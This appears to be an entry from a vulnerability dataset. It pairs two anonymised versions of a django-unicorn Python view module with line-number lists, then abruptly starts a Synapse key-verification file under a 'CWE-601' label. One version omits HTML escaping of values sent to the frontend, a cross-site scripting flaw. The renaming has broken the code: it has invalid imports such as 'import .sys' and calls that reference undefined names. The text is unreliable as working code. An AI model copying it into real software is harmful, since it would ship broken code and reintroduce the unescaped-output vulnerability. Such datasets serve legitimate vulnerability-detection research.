def FUNC_5(self) -> None:
self._attribute_names_cache = self._attribute_names()
self._set_hook_methods_cache()
self._methods_cache = self._methods()
self._set_resettable_attributes_cache()
@timed
def FUNC_6(self):
for (
VAR_55,
pickled_value,
) in self._resettable_attributes_cache.items():
try:
VAR_59 = pickle.loads(pickled_value)
self._set_property(VAR_55, VAR_59)
except TypeError:
VAR_0.warn(
f"Resetting '{VAR_55}' attribute failed because it could not be constructed."
)
pass
except pickle.PickleError:
VAR_0.warn(
f"Resetting '{VAR_55}' attribute failed because it could not be de-pickled."
)
pass
def FUNC_7(self, VAR_21, *VAR_22):
self.calls.append({"fn": VAR_21, "args": VAR_22})
def FUNC_8(self):
pass
def FUNC_9(self):
pass
def FUNC_10(self):
pass
def FUNC_11(self, VAR_23):
pass
def FUNC_12(self, VAR_23):
pass
def FUNC_13(self, VAR_24, VAR_25):
pass
def FUNC_14(self, VAR_24, VAR_25):
pass
def FUNC_15(self, VAR_24, VAR_22):
pass
def FUNC_16(self, VAR_24, VAR_22):
pass
@timed
def FUNC_17(self, VAR_26=False) -> str:
VAR_32 = self.render_to_response(
VAR_39=self.get_context_data(), VAR_17=self, VAR_26=init_js,
)
if hasattr(VAR_32, "render"):
VAR_32.render()
VAR_33 = VAR_32.content.decode("utf-8")
if self.parent:
if not self.parent._children_set:
self.parent.children.append(self)
else:
self._children_set = True
return VAR_33
@timed
def FUNC_18(self) -> str:
VAR_34 = {}
VAR_35 = self._attributes()
VAR_34.update(VAR_35)
if hasattr(self, "Meta") and hasattr(self.Meta, "javascript_exclude"):
if isinstance(self.Meta.javascript_exclude, Sequence):
for field_name in self.Meta.javascript_exclude:
if field_name in VAR_34:
del VAR_34[field_name]
VAR_36 = []
if hasattr(self, "Meta") and hasattr(self.Meta, "safe"):
if isinstance(self.Meta.safe, Sequence):
for field_name in self.Meta.safe:
if field_name in VAR_34:
VAR_36.append(field_name)
VAR_37 = self._get_form(VAR_35)
if VAR_37:
VAR_37.is_valid()
for VAR_67 in VAR_35.keys():
if VAR_67 in VAR_37.fields:
VAR_64 = VAR_37.fields[VAR_67]
if VAR_67 in VAR_37.cleaned_data:
VAR_66 = VAR_37.cleaned_data[VAR_67]
VAR_25 = VAR_64.widget.format_value(VAR_66)
if (
not hasattr(VAR_34[VAR_67], "strip")
or VAR_34[VAR_67].strip() != VAR_25
):
VAR_34[VAR_67] = VAR_25
for (
VAR_60,
frontend_context_variable_value,
) in VAR_34.items():
if (
isinstance(frontend_context_variable_value, str)
and VAR_60 not in VAR_36
):
VAR_34[VAR_60] = escape(
frontend_context_variable_value
)
VAR_38 = serializer.dumps(
VAR_34
)
return VAR_38
@timed
def FUNC_19(self, VAR_27):
if hasattr(self, "form_class"):
try:
VAR_37 = self.form_class(VAR_27)
VAR_37.is_valid()
return VAR_37
except Exception as e:
VAR_0.exception(e)
@timed
def FUNC_20(self, **VAR_12):
VAR_39 = super().get_context_data(**VAR_12)
VAR_35 = self._attributes()
VAR_39.update(VAR_35)
VAR_39.update(self._methods())
VAR_39.update({"unicorn": {"errors": self.errors}})
return VAR_39
@timed
def FUNC_21(self, VAR_28: List = None) -> bool:
return len(self.validate(VAR_28).keys()) == 0
@timed
def FUNC_22(self, VAR_28: List = None) -> Dict:
if self._validate_called:
return self.errors
self._validate_called = True
VAR_27 = self._attributes()
VAR_37 = self._get_form(VAR_27)
if VAR_37:
VAR_54 = VAR_37.errors.get_json_data(escape_html=True)
if self.errors:
VAR_61 = []
for VAR_67, VAR_25 in self.errors.items():
if VAR_67 in VAR_54:
self.errors[VAR_67] = VAR_25
else:
VAR_61.append(VAR_67)
for VAR_67 in VAR_61:
self.errors.pop(VAR_67)
if VAR_28 is not None:
for VAR_67, VAR_25 in VAR_54.items():
if VAR_67 in VAR_28:
self.errors[VAR_67] = VAR_25
else:
self.errors.update(VAR_54)
return self.errors
@timed
def FUNC_23(self) -> List[str]:
VAR_40 = [
member[0] for member in inspect.getmembers(self, lambda x: not callable(x))
]
VAR_41 = [VAR_24 for VAR_24 in VAR_40 if self._is_public(VAR_24)]
return VAR_41
@timed
def FUNC_24(self) -> Dict[str, Any]:
VAR_41 = self._attribute_names_cache
VAR_35 = {}
for VAR_55 in VAR_41:
VAR_35[VAR_55] = getattr(self, VAR_55)
return VAR_35
@timed
def FUNC_25(self, VAR_24, VAR_25):
VAR_27 = self._attributes()
VAR_27[VAR_24] = VAR_25
VAR_37 = self._get_form(VAR_27)
if VAR_37 and VAR_24 in VAR_37.fields and VAR_24 in VAR_37.cleaned_data:
if not hasattr(VAR_25, "strip") or VAR_37.cleaned_data[VAR_24] != VAR_25.strip():
VAR_25 = VAR_37.cleaned_data[VAR_24]
VAR_42 = f"updating_{VAR_24}"
if hasattr(self, VAR_42):
getattr(self, VAR_42)(VAR_25)
try:
setattr(self, VAR_24, VAR_25)
VAR_56 = f"updated_{VAR_24}"
if hasattr(self, VAR_56):
getattr(self, VAR_56)(VAR_25)
except AttributeError as e:
raise
@timed
def FUNC_26(self) -> Dict[str, Callable]:
if self._methods_cache:
return self._methods_cache
VAR_43 = inspect.getmembers(self, inspect.ismethod)
VAR_44 = [
method for method in VAR_43 if self._is_public(method[0])
]
VAR_45 = {k: v for (k, v) in VAR_44}
self._methods_cache = VAR_45
return VAR_45
@timed
def FUNC_27(self) -> None:
self._hook_methods_cache = []
for VAR_55 in self._attribute_names_cache:
VAR_42 = f"updating_{VAR_55}"
VAR_56 = f"updated_{VAR_55}"
VAR_57 = [VAR_42, VAR_56]
for VAR_21 in VAR_57:
if hasattr(self, VAR_21):
self._hook_methods_cache.append(VAR_21)
@timed
def FUNC_28(self) -> None:
self._resettable_attributes_cache = {}
for VAR_55, VAR_59 in self._attributes().items():
if isinstance(VAR_59, UnicornField):
self._resettable_attributes_cache[VAR_55] = pickle.dumps(
VAR_59
)
elif isinstance(VAR_59, Model):
if not VAR_59.pk:
if VAR_55 not in self._resettable_attributes_cache:
try:
self._resettable_attributes_cache[
VAR_55
] = pickle.dumps(VAR_59)
except pickle.PickleError:
VAR_0.warn(
f"Caching '{VAR_55}' failed because it could not be pickled."
)
pass
def FUNC_29(self, VAR_24: str) -> bool:
VAR_46 = (
"render",
"request",
"args",
"kwargs",
"content_type",
"extra_context",
"http_method_names",
"template_engine",
"template_name",
"dispatch",
"id",
"get",
"get_context_data",
"get_template_names",
"render_to_response",
"http_method_not_allowed",
"options",
"setup",
"fill",
"component_id",
"component_name",
"component_key",
"reset",
"mount",
"hydrate",
"updating",
"update",
"calling",
"called",
"complete",
"rendered",
"parent_rendered",
"validate",
"is_valid",
"get_frontend_context_variables",
"errors",
"updated",
"parent",
"children",
"call",
"calls",
"component_cache_key",
)
VAR_47 = []
if hasattr(self, "Meta") and hasattr(self.Meta, "exclude"):
if isinstance(self.Meta.exclude, Sequence):
VAR_47 = self.Meta.exclude
return not (
VAR_24.startswith("_")
or VAR_24 in VAR_46
or VAR_24 in self._hook_methods_cache
or VAR_24 in VAR_47
)
@staticmethod
@timed
def FUNC_30(
VAR_8: str,
VAR_6: str,
VAR_9: str = "",
VAR_10: "UnicornView" = None,
VAR_11: HttpRequest = None,
VAR_29=True,
VAR_12: Dict[str, Any] = {},
) -> "UnicornView":
assert VAR_8, "Component id is required"
assert VAR_6, "Component VAR_24 is required"
@timed
def FUNC_31(
VAR_15: str, VAR_14: str
) -> Type[CLASS_0]:
VAR_58 = importlib.import_module(VAR_15)
VAR_7 = getattr(VAR_58, VAR_14)
return VAR_7
VAR_48 = caches[get_cache_alias()]
VAR_49 = f"unicorn:VAR_17:{VAR_8}"
VAR_50 = VAR_48.get(VAR_49)
if VAR_50:
if VAR_50.parent:
VAR_62 = VAR_48.get(
VAR_50.parent.component_cache_key
)
if VAR_62:
VAR_50.parent = VAR_62
VAR_50.parent.setup(VAR_11)
else:
VAR_50 = VAR_3.get(VAR_8)
if VAR_29 and VAR_50:
VAR_50.setup(VAR_11)
VAR_50._validate_called = False
VAR_50.calls = []
VAR_0.debug(f"Retrieve {VAR_8} from constructed views cache")
return VAR_50
if VAR_8 in VAR_2:
(VAR_7, VAR_10, VAR_12) = VAR_2[VAR_8]
VAR_17 = FUNC_3(
VAR_7=component_class,
VAR_8=component_id,
VAR_6=component_name,
VAR_9=component_key,
VAR_10=parent,
VAR_11=request,
**VAR_12,
)
VAR_0.debug(f"Retrieve {VAR_8} from views cache")
return VAR_17
VAR_13 = []
if VAR_6 in VAR_1:
VAR_13.append(VAR_1[VAR_6])
else:
VAR_13 = FUNC_2(VAR_6)
VAR_65: Union[
Optional[ModuleNotFoundError], Optional[AttributeError]
] = None
for (VAR_14, VAR_15) in VAR_13:
try:
VAR_7 = FUNC_31(VAR_15, VAR_14)
VAR_17 = FUNC_3(
VAR_7=component_class,
VAR_8=component_id,
VAR_6=component_name,
VAR_9=component_key,
VAR_10=parent,
VAR_11=request,
**VAR_12,
)
VAR_1[VAR_6] = (VAR_14, VAR_15)
VAR_2[VAR_8] = (VAR_7, VAR_10, VAR_12)
VAR_63 = None
try:
VAR_63 = get_cacheable_component(VAR_17)
except UnicornCacheError as e:
VAR_0.warning(e)
if VAR_63:
if VAR_4:
VAR_3[VAR_8] = VAR_63
VAR_48.set(
VAR_63.component_cache_key, VAR_63
)
return VAR_17
except ModuleNotFoundError as e:
VAR_65 = e
except AttributeError as e:
VAR_65 = e
raise ComponentLoadError(
f"'{VAR_6}' VAR_17 could not be loaded: {VAR_65}"
) from VAR_65
| import importlib
import inspect
import logging
import pickle
import .sys
from typing import Any, Callable, Dict, List, Optional, Sequence, Type, Union
from django.conf import .settings
from django.core.cache import .caches
from django.core.exceptions import ImproperlyConfigured
from django.db.models import Model
from django.http import HttpRequest
from django.views.generic.base import TemplateView
from cachetools.lru import LRUCache
from django_unicorn.settings import get_cache_alias
from .. import .serializer
from ..decorators import timed
from ..errors import ComponentLoadError, UnicornCacheError
from ..settings import get_setting
from ..utils import get_cacheable_component
from .fields import UnicornField
from .unicorn_template_response import UnicornTemplateResponse
VAR_0 = logging.getLogger(__name__)
VAR_1 = LRUCache(maxsize=100)
VAR_2 = LRUCache(maxsize=100)
VAR_3 = LRUCache(maxsize=100)
VAR_4 = "pytest" not in sys.modules
def FUNC_0(VAR_5: str) -> str:
return VAR_5.replace("-", "_")
def FUNC_1(VAR_5: str) -> str:
VAR_5 = FUNC_0(VAR_5)
return "".join(word.title() for word in VAR_5.split("_"))
def FUNC_2(VAR_6):
VAR_13 = []
if "." in VAR_6:
VAR_6 = VAR_6.replace("/", ".")
VAR_14 = VAR_6.split(".")[-1:][0]
VAR_15 = VAR_6.replace("." + VAR_14, "")
VAR_13.append((VAR_14, VAR_15))
if VAR_6.endswith("View") or VAR_6.endswith("Component"):
return VAR_13
VAR_6 = VAR_6.replace("/", ".")
VAR_14 = FUNC_1(VAR_6)
if "." in VAR_14:
if VAR_14.split(".")[-1:]:
VAR_14 = VAR_14.split(".")[-1:][0]
VAR_14 = f"{VAR_14}View"
VAR_15 = FUNC_0(VAR_6)
VAR_16 = get_setting("APPS", settings.INSTALLED_APPS)
assert (
isinstance(VAR_16, list)
or isinstance(VAR_16, tuple)
or isinstance(VAR_16, set)
), "APPS is expected to be a list, tuple or set"
for VAR_51 in VAR_16:
if ".apps." in VAR_51:
VAR_50 = VAR_51.rindex(".apps.")
VAR_51 = app[:VAR_50]
VAR_30 = f"{VAR_51}.components.{VAR_15}"
VAR_13.append((VAR_14, VAR_30))
return VAR_13
@timed
def FUNC_3(
VAR_7,
VAR_8,
VAR_6,
VAR_9,
VAR_10,
VAR_11,
**VAR_12,
):
VAR_17 = VAR_7(
VAR_8=component_id,
VAR_6=component_name,
VAR_9=component_key,
VAR_10=parent,
VAR_11=request,
**VAR_12,
)
VAR_17.calls = []
VAR_17.children = []
VAR_17._children_set = False
VAR_17.mount()
VAR_17.hydrate()
VAR_17.complete()
VAR_17._validate_called = False
return VAR_17
class CLASS_0(TemplateView):
VAR_18 = UnicornTemplateResponse
VAR_6: str = ""
VAR_9: str = ""
VAR_11 = None
VAR_10 = None
VAR_19 = []
_methods_cache: Dict[str, Callable] = {}
_attribute_names_cache: List[str] = []
_hook_methods_cache: List[str] = []
_resettable_attributes_cache: Dict[str, Any] = {}
calls = []
def __init__(self, **VAR_12):
super().__init__(**VAR_12)
assert self.component_name, "Component VAR_24 is required"
if "id" in VAR_12 and VAR_12["id"]:
self.component_id = VAR_12["id"]
assert hasattr(self, "component_id"), "Component id is required"
assert self.component_id, "Component id is required"
self.component_cache_key = f"unicorn:VAR_17:{self.component_id}"
if "request" in VAR_12:
self.setup(VAR_12["request"])
if "parent" in VAR_12:
self.parent = VAR_12["parent"]
self._init_script: str = ""
self._children_set = False
self._validate_called = False
self.errors = {}
self._set_default_template_name()
self._set_caches()
@timed
def FUNC_4(self) -> None:
VAR_31 = False
try:
self.get_template_names()
VAR_31 = True
except ImproperlyConfigured:
pass
if not self.template_name and not VAR_31:
VAR_52 = self.component_name.replace(".", "/")
self.template_name = f"unicorn/{VAR_52}.html"
@timed
def FUNC_5(self) -> None:
self._attribute_names_cache = self._attribute_names()
self._set_hook_methods_cache()
self._methods_cache = self._methods()
self._set_resettable_attributes_cache()
@timed
def FUNC_6(self):
for (
VAR_54,
pickled_value,
) in self._resettable_attributes_cache.items():
try:
VAR_58 = pickle.loads(pickled_value)
self._set_property(VAR_54, VAR_58)
except TypeError:
VAR_0.warn(
f"Resetting '{VAR_54}' attribute failed because it could not be constructed."
)
pass
except pickle.PickleError:
VAR_0.warn(
f"Resetting '{VAR_54}' attribute failed because it could not be de-pickled."
)
pass
def FUNC_7(self, VAR_21, *VAR_22):
self.calls.append({"fn": VAR_21, "args": VAR_22})
def FUNC_8(self):
pass
def FUNC_9(self):
pass
def FUNC_10(self):
pass
def FUNC_11(self, VAR_23):
pass
def FUNC_12(self, VAR_23):
pass
def FUNC_13(self, VAR_24, VAR_25):
pass
def FUNC_14(self, VAR_24, VAR_25):
pass
def FUNC_15(self, VAR_24, VAR_22):
pass
def FUNC_16(self, VAR_24, VAR_22):
pass
@timed
def FUNC_17(self, VAR_26=False) -> str:
VAR_32 = self.render_to_response(
VAR_38=self.get_context_data(), VAR_17=self, VAR_26=init_js,
)
if hasattr(VAR_32, "render"):
VAR_32.render()
VAR_33 = VAR_32.content.decode("utf-8")
if self.parent:
if not self.parent._children_set:
self.parent.children.append(self)
else:
self._children_set = True
return VAR_33
@timed
def FUNC_18(self) -> str:
VAR_34 = {}
VAR_35 = self._attributes()
VAR_34.update(VAR_35)
if hasattr(self, "Meta") and hasattr(self.Meta, "javascript_exclude"):
if isinstance(self.Meta.javascript_exclude, Sequence):
for field_name in self.Meta.javascript_exclude:
if field_name in VAR_34:
del VAR_34[field_name]
VAR_36 = self._get_form(VAR_35)
if VAR_36:
VAR_36.is_valid()
for VAR_65 in VAR_35.keys():
if VAR_65 in VAR_36.fields:
VAR_62 = VAR_36.fields[VAR_65]
if VAR_65 in VAR_36.cleaned_data:
VAR_64 = VAR_36.cleaned_data[VAR_65]
VAR_25 = VAR_62.widget.format_value(VAR_64)
if (
not hasattr(VAR_34[VAR_65], "strip")
or VAR_34[VAR_65].strip() != VAR_25
):
VAR_34[VAR_65] = VAR_25
VAR_37 = serializer.dumps(
VAR_34
)
return VAR_37
@timed
def FUNC_19(self, VAR_27):
if hasattr(self, "form_class"):
try:
VAR_36 = self.form_class(VAR_27)
VAR_36.is_valid()
return VAR_36
except Exception as e:
VAR_0.exception(e)
@timed
def FUNC_20(self, **VAR_12):
VAR_38 = super().get_context_data(**VAR_12)
VAR_35 = self._attributes()
VAR_38.update(VAR_35)
VAR_38.update(self._methods())
VAR_38.update({"unicorn": {"errors": self.errors}})
return VAR_38
@timed
def FUNC_21(self, VAR_28: List = None) -> bool:
return len(self.validate(VAR_28).keys()) == 0
@timed
def FUNC_22(self, VAR_28: List = None) -> Dict:
if self._validate_called:
return self.errors
self._validate_called = True
VAR_27 = self._attributes()
VAR_36 = self._get_form(VAR_27)
if VAR_36:
VAR_53 = VAR_36.errors.get_json_data(escape_html=True)
if self.errors:
VAR_59 = []
for VAR_65, VAR_25 in self.errors.items():
if VAR_65 in VAR_53:
self.errors[VAR_65] = VAR_25
else:
VAR_59.append(VAR_65)
for VAR_65 in VAR_59:
self.errors.pop(VAR_65)
if VAR_28 is not None:
for VAR_65, VAR_25 in VAR_53.items():
if VAR_65 in VAR_28:
self.errors[VAR_65] = VAR_25
else:
self.errors.update(VAR_53)
return self.errors
@timed
def FUNC_23(self) -> List[str]:
VAR_39 = [
member[0] for member in inspect.getmembers(self, lambda x: not callable(x))
]
VAR_40 = [VAR_24 for VAR_24 in VAR_39 if self._is_public(VAR_24)]
return VAR_40
@timed
def FUNC_24(self) -> Dict[str, Any]:
VAR_40 = self._attribute_names_cache
VAR_35 = {}
for VAR_54 in VAR_40:
VAR_35[VAR_54] = getattr(self, VAR_54)
return VAR_35
@timed
def FUNC_25(self, VAR_24, VAR_25):
VAR_27 = self._attributes()
VAR_27[VAR_24] = VAR_25
VAR_36 = self._get_form(VAR_27)
if VAR_36 and VAR_24 in VAR_36.fields and VAR_24 in VAR_36.cleaned_data:
if not hasattr(VAR_25, "strip") or VAR_36.cleaned_data[VAR_24] != VAR_25.strip():
VAR_25 = VAR_36.cleaned_data[VAR_24]
VAR_41 = f"updating_{VAR_24}"
if hasattr(self, VAR_41):
getattr(self, VAR_41)(VAR_25)
try:
setattr(self, VAR_24, VAR_25)
VAR_55 = f"updated_{VAR_24}"
if hasattr(self, VAR_55):
getattr(self, VAR_55)(VAR_25)
except AttributeError as e:
raise
@timed
def FUNC_26(self) -> Dict[str, Callable]:
if self._methods_cache:
return self._methods_cache
VAR_42 = inspect.getmembers(self, inspect.ismethod)
VAR_43 = [
method for method in VAR_42 if self._is_public(method[0])
]
VAR_44 = {k: v for (k, v) in VAR_43}
self._methods_cache = VAR_44
return VAR_44
@timed
def FUNC_27(self) -> None:
self._hook_methods_cache = []
for VAR_54 in self._attribute_names_cache:
VAR_41 = f"updating_{VAR_54}"
VAR_55 = f"updated_{VAR_54}"
VAR_56 = [VAR_41, VAR_55]
for VAR_21 in VAR_56:
if hasattr(self, VAR_21):
self._hook_methods_cache.append(VAR_21)
@timed
def FUNC_28(self) -> None:
self._resettable_attributes_cache = {}
for VAR_54, VAR_58 in self._attributes().items():
if isinstance(VAR_58, UnicornField):
self._resettable_attributes_cache[VAR_54] = pickle.dumps(
VAR_58
)
elif isinstance(VAR_58, Model):
if not VAR_58.pk:
if VAR_54 not in self._resettable_attributes_cache:
try:
self._resettable_attributes_cache[
VAR_54
] = pickle.dumps(VAR_58)
except pickle.PickleError:
VAR_0.warn(
f"Caching '{VAR_54}' failed because it could not be pickled."
)
pass
def FUNC_29(self, VAR_24: str) -> bool:
VAR_45 = (
"render",
"request",
"args",
"kwargs",
"content_type",
"extra_context",
"http_method_names",
"template_engine",
"template_name",
"dispatch",
"id",
"get",
"get_context_data",
"get_template_names",
"render_to_response",
"http_method_not_allowed",
"options",
"setup",
"fill",
"component_id",
"component_name",
"component_key",
"reset",
"mount",
"hydrate",
"updating",
"update",
"calling",
"called",
"complete",
"rendered",
"parent_rendered",
"validate",
"is_valid",
"get_frontend_context_variables",
"errors",
"updated",
"parent",
"children",
"call",
"calls",
"component_cache_key",
)
VAR_46 = []
if hasattr(self, "Meta") and hasattr(self.Meta, "exclude"):
if isinstance(self.Meta.exclude, Sequence):
VAR_46 = self.Meta.exclude
return not (
VAR_24.startswith("_")
or VAR_24 in VAR_45
or VAR_24 in self._hook_methods_cache
or VAR_24 in VAR_46
)
@staticmethod
@timed
def FUNC_30(
VAR_8: str,
VAR_6: str,
VAR_9: str = "",
VAR_10: "UnicornView" = None,
VAR_11: HttpRequest = None,
VAR_29=True,
VAR_12: Dict[str, Any] = {},
) -> "UnicornView":
assert VAR_8, "Component id is required"
assert VAR_6, "Component VAR_24 is required"
@timed
def FUNC_31(
VAR_15: str, VAR_14: str
) -> Type[CLASS_0]:
VAR_57 = importlib.import_module(VAR_15)
VAR_7 = getattr(VAR_57, VAR_14)
return VAR_7
VAR_47 = caches[get_cache_alias()]
VAR_48 = f"unicorn:VAR_17:{VAR_8}"
VAR_49 = VAR_47.get(VAR_48)
if VAR_49:
if VAR_49.parent:
VAR_60 = VAR_47.get(
VAR_49.parent.component_cache_key
)
if VAR_60:
VAR_49.parent = VAR_60
VAR_49.parent.setup(VAR_11)
else:
VAR_49 = VAR_3.get(VAR_8)
if VAR_29 and VAR_49:
VAR_49.setup(VAR_11)
VAR_49._validate_called = False
VAR_49.calls = []
VAR_0.debug(f"Retrieve {VAR_8} from constructed views cache")
return VAR_49
if VAR_8 in VAR_2:
(VAR_7, VAR_10, VAR_12) = VAR_2[VAR_8]
VAR_17 = FUNC_3(
VAR_7=component_class,
VAR_8=component_id,
VAR_6=component_name,
VAR_9=component_key,
VAR_10=parent,
VAR_11=request,
**VAR_12,
)
VAR_0.debug(f"Retrieve {VAR_8} from views cache")
return VAR_17
VAR_13 = []
if VAR_6 in VAR_1:
VAR_13.append(VAR_1[VAR_6])
else:
VAR_13 = FUNC_2(VAR_6)
VAR_63: Union[
Optional[ModuleNotFoundError], Optional[AttributeError]
] = None
for (VAR_14, VAR_15) in VAR_13:
try:
VAR_7 = FUNC_31(VAR_15, VAR_14)
VAR_17 = FUNC_3(
VAR_7=component_class,
VAR_8=component_id,
VAR_6=component_name,
VAR_9=component_key,
VAR_10=parent,
VAR_11=request,
**VAR_12,
)
VAR_1[VAR_6] = (VAR_14, VAR_15)
VAR_2[VAR_8] = (VAR_7, VAR_10, VAR_12)
VAR_61 = None
try:
VAR_61 = get_cacheable_component(VAR_17)
except UnicornCacheError as e:
VAR_0.warning(e)
if VAR_61:
if VAR_4:
VAR_3[VAR_8] = VAR_61
VAR_47.set(
VAR_61.component_cache_key, VAR_61
)
return VAR_17
except ModuleNotFoundError as e:
VAR_63 = e
except AttributeError as e:
VAR_63 = e
raise ComponentLoadError(
f"'{VAR_6}' VAR_17 could not be loaded: {VAR_63}"
) from VAR_63
| [
7,
15,
17,
19,
27,
28,
30,
31,
32,
34,
35,
37,
38,
39,
42,
43,
45,
47,
48,
50,
53,
54,
57,
59,
61,
62,
66,
67,
70,
71,
73,
74,
76,
80,
83,
85,
91,
93,
97,
100,
102,
103,
125,
129,
134,
136,
137,
145,
146,
150,
151,
153,
154,
156,
159,
161,
163,
165,
169,
172,
175,
182,
189,
191,
192,
197,
199,
202,
213,
233,
239,
245,
251,
257,
263,
269,
275,
281,
287,
293,
299,
303,
307,
308,
311,
313,
314,
315,
316,
317,
318,
324,
326,
332,
336,
337,
343,
345,
351,
352,
354,
357,
361,
365,
366,
367,
368,
374,
386,
390,
392,
399,
403,
410,
412,
417,
419,
423,
428,
432,
433,
436,
438,
441,
444,
445,
446,
447,
448,
449,
452,
458,
461,
468,
470,
480,
482,
488,
491,
494,
496,
499,
503,
505,
506,
507,
508,
511,
515,
518,
520,
525,
532,
535,
542,
544,
551,
556,
560,
566,
572,
590,
595,
596,
617,
643,
647,
654,
668,
677,
684,
694,
696,
700,
702,
703,
704,
705,
710,
716,
718,
719,
724,
726,
729,
740,
742,
744,
749,
750,
754,
767,
768,
770,
771,
773,
774,
776,
781,
785,
789,
795,
799,
114,
115,
116,
185,
186,
187,
205,
206,
207,
208,
235,
236,
237,
241,
242,
243,
247,
248,
249,
253,
254,
255,
259,
260,
261,
265,
266,
267,
271,
272,
273,
277,
278,
279,
283,
284,
285,
289,
290,
291,
296,
297,
298,
299,
300,
301,
302,
329,
330,
331,
406,
407,
408,
409,
426,
427,
428,
429,
430,
431,
473,
474,
475,
485,
486,
487,
528,
529,
530,
531,
547,
548,
549,
563,
564,
565,
566,
567,
568,
569,
570,
592,
593,
594,
666,
667,
668,
669,
670,
671,
672,
673,
674,
675,
676,
677,
678,
679,
680,
681,
689,
690,
691
] | [
7,
14,
16,
18,
26,
27,
29,
30,
31,
33,
34,
36,
37,
38,
41,
42,
44,
46,
47,
49,
52,
53,
56,
58,
60,
61,
65,
66,
69,
70,
72,
73,
75,
79,
82,
84,
90,
92,
96,
99,
101,
102,
124,
128,
133,
135,
136,
144,
145,
149,
150,
152,
153,
155,
158,
160,
162,
164,
168,
171,
174,
181,
188,
190,
191,
196,
198,
201,
212,
232,
238,
244,
250,
256,
262,
268,
274,
280,
286,
292,
298,
302,
306,
307,
310,
312,
313,
314,
315,
316,
317,
323,
325,
331,
335,
336,
342,
343,
345,
348,
352,
356,
357,
358,
359,
365,
369,
371,
378,
382,
389,
391,
396,
398,
402,
407,
411,
412,
415,
417,
420,
423,
424,
425,
426,
427,
428,
431,
437,
440,
447,
449,
459,
461,
467,
470,
473,
475,
478,
482,
484,
485,
486,
487,
490,
494,
497,
499,
504,
511,
514,
521,
523,
530,
535,
539,
545,
551,
569,
574,
575,
596,
622,
626,
633,
647,
656,
663,
673,
675,
679,
681,
682,
683,
684,
689,
695,
697,
698,
703,
705,
708,
719,
721,
723,
728,
729,
733,
746,
747,
749,
750,
752,
753,
755,
760,
764,
768,
774,
778,
113,
114,
115,
184,
185,
186,
204,
205,
206,
207,
234,
235,
236,
240,
241,
242,
246,
247,
248,
252,
253,
254,
258,
259,
260,
264,
265,
266,
270,
271,
272,
276,
277,
278,
282,
283,
284,
288,
289,
290,
295,
296,
297,
298,
299,
300,
301,
328,
329,
330,
385,
386,
387,
388,
405,
406,
407,
408,
409,
410,
452,
453,
454,
464,
465,
466,
507,
508,
509,
510,
526,
527,
528,
542,
543,
544,
545,
546,
547,
548,
549,
571,
572,
573,
645,
646,
647,
648,
649,
650,
651,
652,
653,
654,
655,
656,
657,
658,
659,
660,
668,
669,
670
] |
4CWE-601
| # -*- coding: utf-8 -*-
# Copyright 2014-2016 OpenMarket Ltd
# Copyright 2017, 2018 New Vector Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import urllib
from collections import defaultdict
import attr
from signedjson.key import (
decode_verify_key_bytes,
encode_verify_key_base64,
is_signing_algorithm_supported,
)
from signedjson.sign import (
SignatureVerifyException,
encode_canonical_json,
signature_ids,
verify_signed_json,
)
from unpaddedbase64 import decode_base64
from twisted.internet import defer
from synapse.api.errors import (
Codes,
HttpResponseException,
RequestSendFailed,
SynapseError,
)
from synapse.logging.context import (
PreserveLoggingContext,
make_deferred_yieldable,
preserve_fn,
run_in_background,
)
from synapse.storage.keys import FetchKeyResult
from synapse.util import unwrapFirstError
from synapse.util.async_helpers import yieldable_gather_results
from synapse.util.metrics import Measure
from synapse.util.retryutils import NotRetryingDestination
logger = logging.getLogger(__name__)
@attr.s(slots=True, cmp=False)
class VerifyJsonRequest:
"""
A request to verify a JSON object.
Attributes:
server_name(str): The name of the server to verify against.
key_ids(set[str]): The set of key_ids to that could be used to verify the
JSON object
json_object(dict): The JSON object to verify.
minimum_valid_until_ts (int): time at which we require the signing key to
be valid. (0 implies we don't care)
key_ready (Deferred[str, str, nacl.signing.VerifyKey]):
A deferred (server_name, key_id, verify_key) tuple that resolves when
a verify key has been fetched. The deferreds' callbacks are run with no
logcontext.
If we are unable to find a key which satisfies the request, the deferred
errbacks with an M_UNAUTHORIZED SynapseError.
"""
server_name = attr.ib()
json_object = attr.ib()
minimum_valid_until_ts = attr.ib()
request_name = attr.ib()
key_ids = attr.ib(init=False)
key_ready = attr.ib(default=attr.Factory(defer.Deferred))
def __attrs_post_init__(self):
self.key_ids = signature_ids(self.json_object, self.server_name)
class KeyLookupError(ValueError):
pass
class Keyring:
def __init__(self, hs, key_fetchers=None):
self.clock = hs.get_clock()
if key_fetchers is None:
key_fetchers = (
StoreKeyFetcher(hs),
PerspectivesKeyFetcher(hs),
ServerKeyFetcher(hs),
)
self._key_fetchers = key_fetchers
# map from server name to Deferred. Has an entry for each server with
# an ongoing key download; the Deferred completes once the download
# completes.
#
# These are regular, logcontext-agnostic Deferreds.
self.key_downloads = {}
def verify_json_for_server(
self, server_name, json_object, validity_time, request_name
):
"""Verify that a JSON object has been signed by a given server
Args:
server_name (str): name of the server which must have signed this object
json_object (dict): object to be checked
validity_time (int): timestamp at which we require the signing key to
be valid. (0 implies we don't care)
request_name (str): an identifier for this json object (eg, an event id)
for logging.
Returns:
Deferred[None]: completes if the the object was correctly signed, otherwise
errbacks with an error
"""
req = VerifyJsonRequest(server_name, json_object, validity_time, request_name)
requests = (req,)
return make_deferred_yieldable(self._verify_objects(requests)[0])
def verify_json_objects_for_server(self, server_and_json):
"""Bulk verifies signatures of json objects, bulk fetching keys as
necessary.
Args:
server_and_json (iterable[Tuple[str, dict, int, str]):
Iterable of (server_name, json_object, validity_time, request_name)
tuples.
validity_time is a timestamp at which the signing key must be
valid.
request_name is an identifier for this json object (eg, an event id)
for logging.
Returns:
List<Deferred[None]>: for each input triplet, a deferred indicating success
or failure to verify each json object's signature for the given
server_name. The deferreds run their callbacks in the sentinel
logcontext.
"""
return self._verify_objects(
VerifyJsonRequest(server_name, json_object, validity_time, request_name)
for server_name, json_object, validity_time, request_name in server_and_json
)
def _verify_objects(self, verify_requests):
"""Does the work of verify_json_[objects_]for_server
Args:
verify_requests (iterable[VerifyJsonRequest]):
Iterable of verification requests.
Returns:
List<Deferred[None]>: for each input item, a deferred indicating success
or failure to verify each json object's signature for the given
server_name. The deferreds run their callbacks in the sentinel
logcontext.
"""
